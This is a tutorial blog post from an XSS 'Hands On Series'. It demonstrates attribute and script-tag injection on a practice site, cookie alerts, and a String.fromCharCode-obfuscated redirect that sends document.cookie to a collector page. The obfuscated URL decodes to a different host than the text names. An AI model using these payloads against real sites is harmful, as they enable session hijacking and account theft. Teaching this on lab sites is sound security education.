Hands On Series – Cross Site Scripting (XSS) Part 1

The “Hands on Series” continues!

Play

In this episode we start dealing with Cross Site Scripting (XSS) attacks.

CSS = Cascading Style Sheets
XSS = Cross Site Scripting

Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather then attacking other users.

The hackme site has been updated and improved (more about that in a moment)

and now includes a section for XSS which we will be using in this episode.


As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the hacking test site and
have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Lets start by trying to somehow add an attribute so that when someone mouses over the name, the javascript will be executed.

Attack #1 – Against Email Address

Attack 1: Original

<a href=”mailto:john@somedomain.com“>John Doe</a>

Attack 1: Desired addition
onmouseover=”alert(‘Hacked’);”

Attack 1: Desired Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(‘Hacked’);”>Bob Smith</a>

Attack 1: Attack String
bob@bob.com” onmouseover=”alert(‘Hacked’);

Attack 1: Actual Result
<a href=”mailto:bob@bob.com” onmouseover=”alert(‘Hacked’);”>Bob Smith</a>

Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web browser!
This attack is only executed based on a user event (the user mousing over the link)

Lets try creating a script tag, which will get executed while the page is loaded by the browser (so basically right away).

Attack #2 – Against Email Address

Attack 2: Original
<a href=”mailto:john@somedomain.com“>John Doe</a>

Attack 2: Desired addition
<script>alert(‘Hacked’);</script>

Attack 2: Desired Result
<a href=”mailto:bob@bob.com”><script>alert(‘Hacked’);</script><“>Bob Smith</a>

Attack 2: Attack String
bob@bob.com”><script>alert(‘Hacked’);</script><“

Attack 2: Actual Result
<a href=”mailto:bob@bob.com”&gt;&lt;script&gt;alert(‘Hacked’);&lt;/script&gt;&lt;”“>Bob Smith</a>

Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.

Attack #3 – Against Title

Attack 3: Original
<td>Works Great</td>

Attack 3: Desired addition
<script>alert(‘Hacked’);</script>

Attack 3: Desired Result
<td><script>alert(‘Hacked’);</script></td>

Attack 3: Attack String
Works Great<script>alert(‘Hacked’);</script>

Attack 3: Actual Result
<td>Works Great<script>alert(&#39;Hacked&#39;);</script></td>

Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something that doesnt need quotes.

Attack #4 – Against Title

In the alert function lets use the global variable document.domain in the attack string.

Attack 4: Attack String
Works Great<script>alert(document.domain);</script>

Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>

Success! A popup should appear that says hackme.ntobjectives.com

Maybe this isnt convincing enough… lets try cookies.

Attack #5 – Against Title

Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>

Attack 5: Actual Result

<td>Works Great<script>alert(document.cookie);</script></td>

Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.

I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure this isnt an attack point.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

Attack #6 – Against Title

Attack 6: Original
<td>Works Great</td>

Attack 6: Desired addition

<script>window.location=’http://hackme.ntobjectives.com/xss/bin.php?var=’+document.cookie;</script>

We have already established that I cannot insert those single quotes that I need around the URL, so we need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning each decimal value into its character, and it doesnt require any quotes.

So we just convert our desired string into decimal first

This:
http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46, 99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes

Attack 6: Attack String
Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98, 105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>

Attack 6: Actual Result
<td>Works Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98, 105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from, and its unlikely you would have ever noticed that your session information had been stolen

About Dan Kuykendall 173 Articles
Connect with Dan on Google+

3 Comments

  1. Listening to the podcast, but your podcast doesn’t match up with your hackme site. There is no John Doe on it to “screw around with”…
    Great idea though. I may come back at a future date and try again.

  2. This lesson looks pretty good, id love to be able to follow it, but on the Hackme site when i click the product review list all i see is:

    “Warning: mysql_connect() [function.mysql-connect]: Access denied for user ‘ms_hackme_xss’@’localhost’ (using password: YES) in /var/www/webscantest/hackme/xss/products.php on line 5

    Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /var/www/webscantest/hackme/xss/products.php on line 7
    Could not connect:”

    I dont know if its just me or the website, bummer though i wanted to go along with this.

Leave a Reply to Kenny Cancel reply

Your email address will not be published.


*